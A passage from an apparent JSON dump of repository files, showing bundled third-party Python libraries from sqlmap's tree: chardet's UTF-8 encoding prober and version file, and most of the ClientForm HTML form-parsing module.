                            prober.get_confidence())\n        return self.result\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/utf8prober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .charsetprober import CharSetProber\nfrom .enums import ProbingState, MachineState\nfrom .codingstatemachine import CodingStateMachine\nfrom .mbcssm import UTF8_SM_MODEL\n\n\n\nclass UTF8Prober(CharSetProber):\n    ONE_CHAR_PROB = 0.5\n\n    def __init__(self):\n        super(UTF8Prober, self).__init__()\n        self.coding_sm = CodingStateMachine(UTF8_SM_MODEL)\n        self._num_mb_chars = None\n        self.reset()\n\n    def reset(self):\n        super(UTF8Prober, self).reset()\n        self.coding_sm.reset()\n        self._num_mb_chars = 0\n\n    @property\n    def charset_name(self):\n        return \"utf-8\"\n\n    @property\n    def language(self):\n        return \"\"\n\n    def feed(self, byte_str):\n        for c in byte_str:\n            coding_state = self.coding_sm.next_state(c)\n            if coding_state == MachineState.ERROR:\n                self._state = ProbingState.NOT_ME\n                break\n            elif coding_state == MachineState.ITS_ME:\n                self._state = ProbingState.FOUND_IT\n                break\n            elif coding_state == MachineState.START:\n                if self.coding_sm.get_current_charlen() >= 2:\n                    self._num_mb_chars += 1\n\n        if self.state == ProbingState.DETECTING:\n            if self.get_confidence() > self.SHORTCUT_THRESHOLD:\n                self._state = ProbingState.FOUND_IT\n\n        return self.state\n\n    def get_confidence(self):\n        unlike = 0.99\n        if self._num_mb_chars < 6:\n            unlike *= self.ONE_CHAR_PROB ** self._num_mb_chars\n            return 1.0 - unlike\n        else:\n            return unlike\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/version.py",
    "content": "\"\"\"\nThis module exists only to simplify retrieving the version number of chardet\nfrom within setup.py and from chardet subpackages.\n\n:author: Dan Blanchard (dan.blanchard@gmail.com)\n\"\"\"\n\n__version__ = \"3.0.4\"\nVERSION = __version__.split('.')\n"
  },
  {
    "path": "sqlmap/thirdparty/clientform/__init__.py",
    "content": ""
  },
  {
    "path": "sqlmap/thirdparty/clientform/clientform.py",
    "content": "\"\"\"HTML form handling for web clients.\n\nClientForm is a Python module for handling HTML forms on the client\nside, useful for parsing HTML forms, filling them in and returning the\ncompleted forms to the server.  It has developed from a port of Gisle\nAas' Perl module HTML::Form, from the libwww-perl library, but the\ninterface is not the same.\n\nThe most useful docstring is the one for HTMLForm.\n\nRFC 1866: HTML 2.0\nRFC 1867: Form-based File Upload in HTML\nRFC 2388: Returning Values from Forms: multipart/form-data\nHTML 3.2 Specification, W3C Recommendation 14 January 1997 (for ISINDEX)\nHTML 4.01 Specification, W3C Recommendation 24 December 1999\n\n\nCopyright 2002-2007 John J. Lee <jjl@pobox.com>\nCopyright 2005 Gary Poster\nCopyright 2005 Zope Corporation\nCopyright 1998-2000 Gisle Aas.\n\nThis code is free software; you can redistribute it and/or modify it\nunder the terms of the BSD or ZPL 2.1 licenses (see the file\nCOPYING.txt included with the distribution).\n\n\"\"\"\n\n# XXX\n# Remove parser testing hack\n# safeUrl()-ize action\n# Switch to unicode throughout (would be 0.3.x)\n#  See Wichert Akkerman's 2004-01-22 message to c.l.py.\n# Add charset parameter to Content-type headers?  How to find value??\n# Add some more functional tests\n#  Especially single and multiple file upload on the internet.\n#  Does file upload work when name is missing?  Sourceforge tracker form\n#   doesn't like it.  Check standards, and test with Apache.  Test\n#   binary upload with Apache.\n# mailto submission & enctype text/plain\n# I'm not going to fix this unless somebody tells me what real servers\n#  that want this encoding actually expect: If enctype is\n#  application/x-www-form-urlencoded and there's a FILE control present.\n#  Strictly, it should be 'name=data' (see HTML 4.01 spec., section\n#  17.13.2), but I send \"name=\" ATM.  What about multiple file upload??\n\n# Would be nice, but I'm not going to do it myself:\n# -------------------------------------------------\n# Maybe a 0.4.x?\n#   Replace by_label etc. with moniker / selector concept. Allows, eg.,\n#    a choice between selection by value / id / label / element\n#    contents.  Or choice between matching labels exactly or by\n#    substring.  Etc.\n#   Remove deprecated methods.\n#   ...what else?\n# Work on DOMForm.\n# XForms?  Don't know if there's a need here.\n\n__all__ = ['AmbiguityError', 'CheckboxControl', 'Control',\n           'ControlNotFoundError', 'FileControl', 'FormParser', 'HTMLForm',\n           'HiddenControl', 'IgnoreControl', 'ImageControl', 'IsindexControl',\n           'Item', 'ItemCountError', 'ItemNotFoundError', 'Label',\n           'ListControl', 'LocateError', 'Missing', 'ParseError', 'ParseFile',\n           'ParseFileEx', 'ParseResponse', 'ParseResponseEx','PasswordControl',\n           'RadioControl', 'ScalarControl', 'SelectControl',\n           'SubmitButtonControl', 'SubmitControl', 'TextControl',\n           'TextareaControl', 'XHTMLCompatibleFormParser']\n\ntry:\n    import logging\n    import inspect\nexcept ImportError:\n    def debug(msg, *args, **kwds):\n        pass\nelse:\n    _logger = logging.getLogger(\"ClientForm\")\n    OPTIMIZATION_HACK = True\n\n    def debug(msg, *args, **kwds):\n        if OPTIMIZATION_HACK:\n            return\n\n        caller_name = inspect.stack()[1][3]\n        extended_msg = '%%s %s' % msg\n        extended_args = (caller_name,)+args\n        debug = _logger.debug(extended_msg, *extended_args, **kwds)\n\n    def _show_debug_messages():\n        global OPTIMIZATION_HACK\n        OPTIMIZATION_HACK = False\n        _logger.setLevel(logging.DEBUG)\n        handler = logging.StreamHandler(sys.stdout)\n        handler.setLevel(logging.DEBUG)\n        _logger.addHandler(handler)\n\ntry:\n    from thirdparty import six\n    from thirdparty.six import unichr as _unichr\n    from thirdparty.six.moves import cStringIO as _cStringIO\n    from thirdparty.six.moves import html_entities as _html_entities\n    from thirdparty.six.moves import urllib as _urllib\nexcept ImportError:\n    import six\n    from six import unichr as _unichr\n    from six.moves import cStringIO as _cStringIO\n    from six.moves import html_entities as _html_entities\n    from six.moves import urllib as _urllib\n\ntry:\n    import sgmllib\nexcept ImportError:\n    from lib.utils import sgmllib\n\nimport sys, re, random\n\nif sys.version_info >= (3, 0):\n    xrange = range\n\n# monkeypatch to fix http://www.python.org/sf/803422 :-(\nsgmllib.charref = re.compile(\"&#(x?[0-9a-fA-F]+)[^0-9a-fA-F]\")\n\n# HTMLParser.HTMLParser is recent, so live without it if it's not available\n# (also, sgmllib.SGMLParser is much more tolerant of bad HTML)\ntry:\n    import HTMLParser\nexcept ImportError:\n    HAVE_MODULE_HTMLPARSER = False\nelse:\n    HAVE_MODULE_HTMLPARSER = True\n\ntry:\n    import warnings\nexcept ImportError:\n    def deprecation(message, stack_offset=0):\n        pass\nelse:\n    def deprecation(message, stack_offset=0):\n        warnings.warn(message, DeprecationWarning, stacklevel=3+stack_offset)\n\nVERSION = \"0.2.10\"\n\nCHUNK = 1024  # size of chunks fed to parser, in bytes\n\nDEFAULT_ENCODING = \"latin-1\"\n\nclass Missing: pass\n\n_compress_re = re.compile(r\"\\s+\")\ndef compress_text(text): return _compress_re.sub(\" \", text.strip())\n\ndef normalize_line_endings(text):\n    return re.sub(r\"(?:(?<!\\r)\\n)|(?:\\r(?!\\n))\", \"\\r\\n\", text)\n\ndef _quote_plus(value):\n    if not isinstance(value, six.string_types):\n        value = six.text_type(value)\n\n    if isinstance(value, six.text_type):\n        value = value.encode(\"utf8\")\n\n    return _urllib.parse.quote_plus(value)\n\n# This version of urlencode is from my Python 1.5.2 back-port of the\n# Python 2.1 CVS maintenance branch of urllib.  It will accept a sequence\n# of pairs instead of a mapping -- the 2.0 version only accepts a mapping.\ndef urlencode(query,doseq=False,):\n    \"\"\"Encode a sequence of two-element tuples or dictionary into a URL query \\\nstring.\n\n    If any values in the query arg are sequences and doseq is true, each\n    sequence element is converted to a separate parameter.\n\n    If the query arg is a sequence of two-element tuples, the order of the\n    parameters in the output will match the order of parameters in the\n    input.\n    \"\"\"\n\n    if hasattr(query,\"items\"):\n        # mapping objects\n        query = query.items()\n    else:\n        # it's a bother at times that strings and string-like objects are\n        # sequences...\n        try:\n            # non-sequence items should not work with len()\n            x = len(query)\n            # non-empty strings will fail this\n            if len(query) and type(query[0]) != tuple:\n                raise TypeError()\n            # zero-length sequences of all types will get here and succeed,\n            # but that's a minor nit - since the original implementation\n            # allowed empty dicts that type of behavior probably should be\n            # preserved for consistency\n        except TypeError:\n            ty,va,tb = sys.exc_info()\n            raise TypeError(\"not a valid non-string sequence or mapping \"\n                            \"object\", tb)\n\n    l = []\n    if not doseq:\n        # preserve old behavior\n        for k, v in query:\n            k = _quote_plus(k)\n            v = _quote_plus(v)\n            l.append(k + '=' + v)\n    else:\n        for k, v in query:\n            k = _quote_plus(k)\n            if isinstance(v, six.string_types):\n                v = _quote_plus(v)\n                l.append(k + '=' + v)\n            else:\n                try:\n                    # is this a sufficient test for sequence-ness?\n                    x = len(v)\n                except TypeError:\n                    # not a sequence\n                    v = _quote_plus(v)\n                    l.append(k + '=' + v)\n                else:\n                    # loop over the sequence\n                    for elt in v:\n                        l.append(k + '=' + _quote_plus(elt))\n    return '&'.join(l)\n\ndef unescape(data, entities, encoding=DEFAULT_ENCODING):\n    if data is None or \"&\" not in data:\n        return data\n\n    if isinstance(data, six.string_types):\n        encoding = None\n\n    def replace_entities(match, entities=entities, encoding=encoding):\n        ent = match.group()\n        if ent[1] == \"#\":\n            return unescape_charref(ent[2:-1], encoding)\n\n        repl = entities.get(ent)\n        if repl is not None:\n            if hasattr(repl, \"decode\") and encoding is not None:\n                try:\n                    repl = repl.decode(encoding)\n                except UnicodeError:\n                    repl = ent\n        else:\n            repl = ent\n\n        return repl\n\n    return re.sub(r\"&#?[A-Za-z0-9]+?;\", replace_entities, data)\n\ndef unescape_charref(data, encoding):\n    name, base = data, 10\n    if name.startswith(\"x\"):\n        name, base= name[1:], 16\n    elif not name.isdigit():\n        base = 16\n\n    try:\n        return _unichr(int(name, base))\n    except:\n        return data\n\ndef get_entitydefs():\n    from codecs import latin_1_decode\n    entitydefs = {}\n    try:\n        _html_entities.name2codepoint\n    except AttributeError:\n        entitydefs = {}\n        for name, char in _html_entities.entitydefs.items():\n            uc = latin_1_decode(char)[0]\n            if uc.startswith(\"&#\") and uc.endswith(\";\"):\n                uc = unescape_charref(uc[2:-1], None)\n            entitydefs[\"&%s;\" % name] = uc\n    else:\n        for name, codepoint in _html_entities.name2codepoint.items():\n            entitydefs[\"&%s;\" % name] = _unichr(codepoint)\n    return entitydefs\n\ndef issequence(x):\n    try:\n        x[0]\n    except (TypeError, KeyError):\n        return False\n    except IndexError:\n        pass\n    return True\n\ndef isstringlike(x):\n    try: x+\"\"\n    except: return False\n    else: return True\n\n\ndef choose_boundary():\n    \"\"\"Return a string usable as a multipart boundary.\"\"\"\n    # follow IE and firefox\n    nonce = \"\".join([str(random.randint(0, sys.maxsize-1)) for i in (0,1,2)])\n    return \"-\"*27 + nonce\n\n# This cut-n-pasted MimeWriter from standard library is here so can add\n# to HTTP headers rather than message body when appropriate.  It also uses\n# \\r\\n in place of \\n.  This is a bit nasty.\nclass MimeWriter:\n\n    \"\"\"Generic MIME writer.\n\n    Methods:\n\n    __init__()\n    addheader()\n    flushheaders()\n    startbody()\n    startmultipartbody()\n    nextpart()\n    lastpart()\n\n    A MIME writer is much more primitive than a MIME parser.  It\n    doesn't seek around on the output file, and it doesn't use large\n    amounts of buffer space, so you have to write the parts in the\n    order they should occur on the output file.  It does buffer the\n    headers you add, allowing you to rearrange their order.\n\n    General usage is:\n\n    f = <open the output file>\n    w = MimeWriter(f)\n    ...call w.addheader(key, value) 0 or more times...\n\n    followed by either:\n\n    f = w.startbody(content_type)\n    ...call f.write(data) for body data...\n\n    or:\n\n    w.startmultipartbody(subtype)\n    for each part:\n        subwriter = w.nextpart()\n        ...use the subwriter's methods to create the subpart...\n    w.lastpart()\n\n    The subwriter is another MimeWriter instance, and should be\n    treated in the same way as the toplevel MimeWriter.  This way,\n    writing recursive body parts is easy.\n\n    Warning: don't forget to call lastpart()!\n\n    XXX There should be more state so calls made in the wrong order\n    are detected.\n\n    Some special cases:\n\n    - startbody() just returns the file passed to the constructor;\n      but don't use this knowledge, as it may be changed.\n\n    - startmultipartbody() actually returns a file as well;\n      this can be used to write the initial 'if you can read this your\n      mailer is not MIME-aware' message.\n\n    - If you call flushheaders(), the headers accumulated so far are\n      written out (and forgotten); this is useful if you don't need a\n      body part at all, e.g. for a subpart of type message/rfc822\n      that's (mis)used to store some header-like information.\n\n    - Passing a keyword argument 'prefix=<flag>' to addheader(),\n      start*body() affects where the header is inserted; 0 means\n      append at the end, 1 means insert at the start; default is\n      append for addheader(), but insert for start*body(), which use\n      it to determine where the Content-type header goes.\n\n    \"\"\"\n\n    def __init__(self, fp, http_hdrs=None):\n        self._http_hdrs = http_hdrs\n        self._fp = fp\n        self._headers = []\n        self._boundary = []\n        self._first_part = True\n\n    def addheader(self, key, value, prefix=0,\n                  add_to_http_hdrs=0):\n        \"\"\"\n        prefix is ignored if add_to_http_hdrs is true.\n        \"\"\"\n        lines = value.split(\"\\r\\n\")\n        while lines and not lines[-1]: del lines[-1]\n        while lines and not lines[0]: del lines[0]\n        if add_to_http_hdrs:\n            value = \"\".join(lines)\n            # 2.2 urllib2 doesn't normalize header case\n            self._http_hdrs.append((key.capitalize(), value))\n        else:\n            for i in xrange(1, len(lines)):\n                lines[i] = \"    \" + lines[i].strip()\n            value = \"\\r\\n\".join(lines) + \"\\r\\n\"\n            line = key.title() + \": \" + value\n            if prefix:\n                self._headers.insert(0, line)\n            else:\n                self._headers.append(line)\n\n    def flushheaders(self):\n        self._fp.writelines(self._headers)\n        self._headers = []\n\n    def startbody(self, ctype=None, plist=[], prefix=1,\n                  add_to_http_hdrs=0, content_type=1):\n        \"\"\"\n        prefix is ignored if add_to_http_hdrs is true.\n        \"\"\"\n        if content_type and ctype:\n            for name, value in plist:\n                ctype = ctype + ';\\r\\n %s=%s' % (name, value)\n            self.addheader(\"Content-Type\", ctype, prefix=prefix,\n                           add_to_http_hdrs=add_to_http_hdrs)\n        self.flushheaders()\n        if not add_to_http_hdrs: self._fp.write(\"\\r\\n\")\n        self._first_part = True\n        return self._fp\n\n    def startmultipartbody(self, subtype, boundary=None, plist=[], prefix=1,\n                           add_to_http_hdrs=0, content_type=1):\n        boundary = boundary or choose_boundary()\n        self._boundary.append(boundary)\n        return self.startbody(\"multipart/\" + subtype,\n                              [(\"boundary\", boundary)] + plist,\n                              prefix=prefix,\n                              add_to_http_hdrs=add_to_http_hdrs,\n                              content_type=content_type)\n\n    def nextpart(self):\n        boundary = self._boundary[-1]\n        if self._first_part:\n            self._first_part = False\n        else:\n            self._fp.write(\"\\r\\n\")\n        self._fp.write(\"--\" + boundary + \"\\r\\n\")\n        return self.__class__(self._fp)\n\n    def lastpart(self):\n        if self._first_part:\n            self.nextpart()\n        boundary = self._boundary.pop()\n        self._fp.write(\"\\r\\n--\" + boundary + \"--\\r\\n\")\n\n\nclass LocateError(ValueError): pass\nclass AmbiguityError(LocateError): pass\nclass ControlNotFoundError(LocateError): pass\nclass ItemNotFoundError(LocateError): pass\n\nclass ItemCountError(ValueError): pass\n\n# for backwards compatibility, ParseError derives from exceptions that were\n# raised by versions of ClientForm <= 0.2.5\nif HAVE_MODULE_HTMLPARSER:\n    SGMLLIB_PARSEERROR = sgmllib.SGMLParseError\n    class ParseError(sgmllib.SGMLParseError,\n                     HTMLParser.HTMLParseError,\n                     ):\n        pass\nelse:\n    if hasattr(sgmllib, \"SGMLParseError\"):\n        SGMLLIB_PARSEERROR = sgmllib.SGMLParseError\n        class ParseError(sgmllib.SGMLParseError):\n            pass\n    else:\n        SGMLLIB_PARSEERROR = RuntimeError\n        class ParseError(RuntimeError):\n            pass\n\n\nclass _AbstractFormParser:\n    \"\"\"forms attribute contains HTMLForm instances on completion.\"\"\"\n    # thanks to Moshe Zadka for an example of sgmllib/htmllib usage\n    def __init__(self, entitydefs=None, encoding=DEFAULT_ENCODING):\n        if entitydefs is None:\n            entitydefs = get_entitydefs()\n        self._entitydefs = entitydefs\n        self._encoding = encoding\n\n        self.base = None\n        self.forms = []\n        self.labels = []\n        self._current_label = None\n        self._current_form = None\n        self._select = None\n        self._optgroup = None\n        self._option = None\n        self._textarea = None\n\n        # forms[0] will contain all controls that are outside of any form\n        # self._global_form is an alias for self.forms[0]\n        self._global_form = None\n        self.start_form([])\n        self.end_form()\n        self._current_form = self._global_form = self.forms[0]\n\n    def do_base(self, attrs):\n        debug(\"%s\", attrs)\n        for key, value in attrs:\n            if key == \"href\":\n                self.base = self.unescape_attr_if_required(value)\n\n    def end_body(self):\n        debug(\"\")\n        if self._current_label is not None:\n            self.end_label()\n        if self._current_form is not self._global_form:\n            self.end_form()\n\n    def start_form(self, attrs):\n        debug(\"%s\", attrs)\n        if self._current_form is not self._global_form:\n            raise ParseError(\"nested FORMs\")\n        name = None\n        action = None\n        enctype = \"application/x-www-form-urlencoded\"\n        method = \"GET\"\n        d = {}\n        for key, value in attrs:\n            if key == \"name\":\n                name = self.unescape_attr_if_required(value)\n            elif key == \"action\":\n                action = self.unescape_attr_if_required(value)\n            elif key == \"method\":\n                method = self.unescape_attr_if_required(value.upper())\n            elif key == \"enctype\":\n                enctype = self.unescape_attr_if_required(value.lower())\n            d[key] = self.unescape_attr_if_required(value)\n        controls = []\n        self._current_form = (name, action, method, enctype), d, controls\n\n    def end_form(self):\n        debug(\"\")\n        if self._current_label is not None:\n            self.end_label()\n        if self._current_form is self._global_form:\n            raise ParseError(\"end of FORM before start\")\n        self.forms.append(self._current_form)\n        self._current_form = self._global_form\n\n    def start_select(self, attrs):\n        debug(\"%s\", attrs)\n        if self._select is not None:\n            raise ParseError(\"nested SELECTs\")\n        if self._textarea is not None:\n            raise ParseError(\"SELECT inside TEXTAREA\")\n        d = {}\n        for key, val in attrs:\n            d[key] = self.unescape_attr_if_required(val)\n\n        self._select = d\n        self._add_label(d)\n\n        self._append_select_control({\"__select\": d})\n\n    def end_select(self):\n        debug(\"\")\n        if self._select is None:\n            raise ParseError(\"end of SELECT before start\")\n\n        if self._option is not None:\n            self._end_option()\n\n        self._select = None\n\n    def start_optgroup(self, attrs):\n        debug(\"%s\", attrs)\n        if self._select is None:\n            raise ParseError(\"OPTGROUP outside of SELECT\")\n        d = {}\n        for key, val in attrs:\n            d[key] = self.unescape_attr_if_required(val)\n\n        self._optgroup = d\n\n    def end_optgroup(self):\n        debug(\"\")\n        if self._optgroup is None:\n            raise ParseError(\"end of OPTGROUP before start\")\n        self._optgroup = None\n\n    def _start_option(self, attrs):\n        debug(\"%s\", attrs)\n        if self._select is None:\n            raise ParseError(\"OPTION outside of SELECT\")\n        if self._option is not None:\n            self._end_option()\n\n        d = {}\n        for key, val in attrs:\n            d[key] = self.unescape_attr_if_required(val)\n\n        self._option = {}\n        self._option.update(d)\n        if (self._optgroup and \"disabled\" in self._optgroup and\n            \"disabled\" not in self._option):\n            self._option[\"disabled\"] = None\n\n    def _end_option(self):\n        debug(\"\")\n        if self._option is None:\n            raise ParseError(\"end of OPTION before start\")\n\n        contents = self._option.get(\"contents\", \"\").strip()\n        self._option[\"contents\"] = contents\n        if \"value\" not in self._option:\n            self._option[\"value\"] = contents\n        if \"label\" not in self._option:\n            self._option[\"label\"] = contents\n        # stuff dict of SELECT HTML attrs into a special private key\n        #  (gets deleted again later)\n        self._option[\"__select\"] = self._select\n        self._append_select_control(self._option)\n        self._option = None\n\n    def _append_select_control(self, attrs):\n        debug(\"%s\", attrs)\n        controls = self._current_form[2]\n        name = self._select.get(\"name\")\n        controls.append((\"select\", name, attrs))\n\n    def start_textarea(self, attrs):\n        debug(\"%s\", attrs)\n        if self._textarea is not None:\n            raise ParseError(\"nested TEXTAREAs\")\n        if self._select is not None:\n            raise ParseError(\"TEXTAREA inside SELECT\")\n        d = {}\n        for key, val in attrs:\n            d[key] = self.unescape_attr_if_required(val)\n        self._add_label(d)\n\n        self._textarea = d\n\n    def end_textarea(self):\n        debug(\"\")\n        if self._textarea is None:\n            raise ParseError(\"end of TEXTAREA before start\")\n        controls = self._current_form[2]\n        name = self._textarea.get(\"name\")\n        controls.append((\"textarea\", name, self._textarea))\n        self._textarea = None\n\n    def start_label(self, attrs):\n        debug(\"%s\", attrs)\n        if self._current_label:\n            self.end_label()\n        d = {}\n        for key, val in attrs:\n            d[key] = self.unescape_attr_if_required(val)\n        taken = bool(d.get(\"for\"))  # empty id is invalid\n        d[\"__text\"] = \"\"\n        d[\"__taken\"] = taken\n        if taken:\n            self.labels.append(d)\n        self._current_label = d\n\n    def end_label(self):\n        debug(\"\")\n        label = self._current_label\n        if label is None:\n            # something is ugly in the HTML, but we're ignoring it\n            return\n        self._current_label = None\n        # if it is staying around, it is True in all cases\n        del label[\"__taken\"]\n\n    def _add_label(self, d):\n        #debug(\"%s\", d)\n        if self._current_label is not None:\n            if not self._current_label[\"__taken\"]:\n                self._current_label[\"__taken\"] = True\n                d[\"__label\"] = self._current_label\n\n    def handle_data(self, data):\n        debug(\"%s\", data)\n\n        if self._option is not None:\n            # self._option is a dictionary of the OPTION element's HTML\n            # attributes, but it has two special keys, one of which is the\n            # special \"contents\" key contains text between OPTION tags (the\n            # other is the \"__select\" key: see the end_option method)\n            map = self._option\n            key = \"contents\"\n        elif self._textarea is not None:\n            map = self._textarea\n            key = \"value\"\n            data = normalize_line_endings(data)\n        # not if within option or textarea\n        elif self._current_label is not None:\n            map = self._current_label\n            key = \"__text\"\n        else:\n            return\n\n        if data and key not in map:\n            # according to\n            # http://www.w3.org/TR/html4/appendix/notes.html#h-B.3.1 line break\n            # immediately after start tags or immediately before end tags must\n            # be ignored, but real browsers only ignore a line break after a\n            # start tag, so we'll do that.\n            if data[0:2] == \"\\r\\n\":\n                data = data[2:]\n            elif data[0:1] in [\"\\n\", \"\\r\"]:\n                data = data[1:]\n            map[key] = data\n        else:\n            map[key] = (map[key].decode(\"utf8\", \"replace\") if isinstance(map[key], six.binary_type) else map[key]) + data\n\n    def do_button(self, attrs):\n        debug(\"%s\", attrs)\n        d = {}\n        d[\"type\"] = \"submit\"  # default\n        for key, val in attrs:\n            d[key] = self.unescape_attr_if_required(val)\n        controls = self._current_form[2]\n\n        type = d[\"type\"]\n        name = d.get(\"name\")\n        # we don't want to lose information, so use a type string that\n        # doesn't clash with INPUT TYPE={SUBMIT,RESET,BUTTON}\n        # e.g. type for BUTTON/RESET is \"resetbutton\"\n        #     (type for INPUT/RESET is \"reset\")\n        type = type+\"button\"\n        self._add_label(d)\n        controls.append((type, name, d))\n\n    def do_input(self, attrs):\n        debug(\"%s\", attrs)\n        d = {}\n        d[\"type\"] = \"text\"  # default\n        for key, val in attrs:\n            d[key] = self.unescape_attr_if_required(val)\n        controls = self._current_form[2]\n\n        type = d[\"type\"]\n        name = d.get(\"name\")\n        self._add_label(d)\n        controls.append((type, name, d))\n\n    def do_isindex(self, attrs):\n        debug(\"%s\", attrs)\n        d = {}\n        for key, val in attrs:\n            d[key] = self.unescape_attr_if_required(val)\n        controls = self._current_form[2]\n\n        self._add_label(d)\n        # isindex doesn't have type or name HTML attributes\n        controls.append((\"isindex\", None, d))\n\n    def handle_entityref(self, name):\n        #debug(\"%s\", name)\n        self.handle_data(unescape(\n            '&%s;' % name, self._entitydefs, self._encoding))\n\n    def handle_charref(self, name):\n        #debug(\"%s\", name)\n        self.handle_data(unescape_charref(name, self._encoding))\n\n    def unescape_attr(self, name):\n        #debug(\"%s\", name)\n        return unescape(name, self._entitydefs, self._encoding)\n\n    def unescape_attrs(self, attrs):\n        #debug(\"%s\", attrs)\n        escaped_attrs = {}\n        for key, val in attrs.items():\n            try:\n                val.items\n            except AttributeError:\n                escaped_attrs[key] = self.unescape_attr(val)\n            else:\n                # e.g. \"__select\" -- yuck!\n                escaped_attrs[key] = self.unescape_attrs(val)\n        return escaped_attrs\n\n    def unknown_entityref(self, ref): self.handle_data(\"&%s;\" % ref)\n    def unknown_charref(self, ref): self.handle_data(\"&#%s;\" % ref)\n\n\nif not HAVE_MODULE_HTMLPARSER:\n    class XHTMLCompatibleFormParser:\n        def __init__(self, entitydefs=None, encoding=DEFAULT_ENCODING):\n            raise ValueError(\"HTMLParser could not be imported\")\nelse:\n    class XHTMLCompatibleFormParser(_AbstractFormParser, HTMLParser.HTMLParser):\n        \"\"\"Good for XHTML, bad for tolerance of incorrect HTML.\"\"\"\n        # thanks to Michael Howitz for this!\n        def __init__(self, entitydefs=None, encoding=DEFAULT_ENCODING):\n            HTMLParser.HTMLParser.__init__(self)\n            _AbstractFormParser.__init__(self, entitydefs, encoding)\n\n        def feed(self, data):\n            try:\n                HTMLParser.HTMLParser.feed(self, data)\n            except HTMLParser.HTMLParseError as exc:\n                raise ParseError(exc)\n\n        def start_option(self, attrs):\n            _AbstractFormParser._start_option(self, attrs)\n\n        def end_option(self):\n            _AbstractFormParser._end_option(self)\n\n        def handle_starttag(self, tag, attrs):\n            try:\n                method = getattr(self, \"start_\" + tag)\n            except AttributeError:\n                try:\n                    method = getattr(self, \"do_\" + tag)\n                except AttributeError:\n                    pass  # unknown tag\n                else:\n                    method(attrs)\n            else:\n                method(attrs)\n\n        def handle_endtag(self, tag):\n            try:\n                method = getattr(self, \"end_\" + tag)\n            except AttributeError:\n                pass  # unknown tag\n            else:\n                method()\n\n        def unescape(self, name):\n            # Use the entitydefs passed into constructor, not\n            # HTMLParser.HTMLParser's entitydefs.\n            return self.unescape_attr(name)\n\n        def unescape_attr_if_required(self, name):\n            return name  # HTMLParser.HTMLParser already did it\n        def unescape_attrs_if_required(self, attrs):\n            return attrs  # ditto\n\n        def close(self):\n            HTMLParser.HTMLParser.close(self)\n            self.end_body()\n\n\nclass _AbstractSgmllibParser(_AbstractFormParser):\n\n    def do_option(self, attrs):\n        _AbstractFormParser._start_option(self, attrs)\n\n    if sys.version_info[:2] >= (2,5):\n        # we override this attr to decode hex charrefs\n        entity_or_charref = re.compile(\n            '&(?:([a-zA-Z][-.a-zA-Z0-9]*)|#(x?[0-9a-fA-F]+))(;?)')\n        def convert_entityref(self, name):\n            return unescape(\"&%s;\" % name, self._entitydefs, self._encoding)\n        def convert_charref(self, name):\n            return unescape_charref(\"%s\" % name, self._encoding)\n        def unescape_attr_if_required(self, name):\n            return name  # sgmllib already did it\n        def unescape_attrs_if_required(self, attrs):\n            return attrs  # ditto\n    else:\n        def unescape_attr_if_required(self, name):\n            return self.unescape_attr(name)\n        def unescape_attrs_if_required(self, attrs):\n            return self.unescape_attrs(attrs)\n\n\nclass FormParser(_AbstractSgmllibParser, sgmllib.SGMLParser):\n    \"\"\"Good for tolerance of incorrect HTML, bad for XHTML.\"\"\"\n    def __init__(self, entitydefs=None, encoding=DEFAULT_ENCODING):\n        sgmllib.SGMLParser.__init__(self)\n        _AbstractFormParser.__init__(self, entitydefs, encoding)\n\n    def feed(self, data):\n        try:\n            sgmllib.SGMLParser.feed(self, data)\n        except SGMLLIB_PARSEERROR as exc:\n            raise ParseError(exc)\n\n    def close(self):\n        sgmllib.SGMLParser.close(self)\n        self.end_body()\n\n\n# sigh, must support mechanize by allowing dynamic creation of classes based on\n# its bundled copy of BeautifulSoup (which was necessary because of dependency\n# problems)\n\ndef _create_bs_classes(bs,\n                       icbinbs,\n                       ):\n    class _AbstractBSFormParser(_AbstractSgmllibParser):\n        bs_base_class = None\n        def __init__(self, entitydefs=None, encoding=DEFAULT_ENCODING):\n            _AbstractFormParser.__init__(self, entitydefs, encoding)\n            self.bs_base_class.__init__(self)\n        def handle_data(self, data):\n            _AbstractFormParser.handle_data(self, data)\n            self.bs_base_class.handle_data(self, data)\n        def feed(self, data):\n            try:\n                self.bs_base_class.feed(self, data)\n            except SGMLLIB_PARSEERROR as exc:\n                raise ParseError(exc)\n        def close(self):\n            self.bs_base_class.close(self)\n            self.end_body()\n\n    class RobustFormParser(_AbstractBSFormParser, bs):\n        \"\"\"Tries to be highly tolerant of incorrect HTML.\"\"\"\n        pass\n    RobustFormParser.bs_base_class = bs\n    class NestingRobustFormParser(_AbstractBSFormParser, icbinbs):\n        \"\"\"Tries to be highly tolerant of incorrect HTML.\n\n        Different from RobustFormParser in that it more often guesses nesting\n        above missing end tags (see BeautifulSoup docs).\n\n        \"\"\"\n        pass\n    NestingRobustFormParser.bs_base_class = icbinbs\n\n    return RobustFormParser, NestingRobustFormParser\n\ntry:\n    if sys.version_info[:2] < (2, 2):\n        raise ImportError  # BeautifulSoup uses generators\n    import BeautifulSoup\nexcept ImportError:\n    pass\nelse:\n    RobustFormParser, NestingRobustFormParser = _create_bs_classes(\n        BeautifulSoup.BeautifulSoup, BeautifulSoup.ICantBelieveItsBeautifulSoup\n        )\n    __all__ += ['RobustFormParser', 'NestingRobustFormParser']\n\n\n#FormParser = XHTMLCompatibleFormParser  # testing hack\n#FormParser = RobustFormParser  # testing hack\n\n\ndef ParseResponseEx(response,\n                    select_default=False,\n                    form_parser_class=FormParser,\n                    request_class=_urllib.request.Request,\n                    entitydefs=None,\n                    encoding=DEFAULT_ENCODING,\n\n                    # private\n                    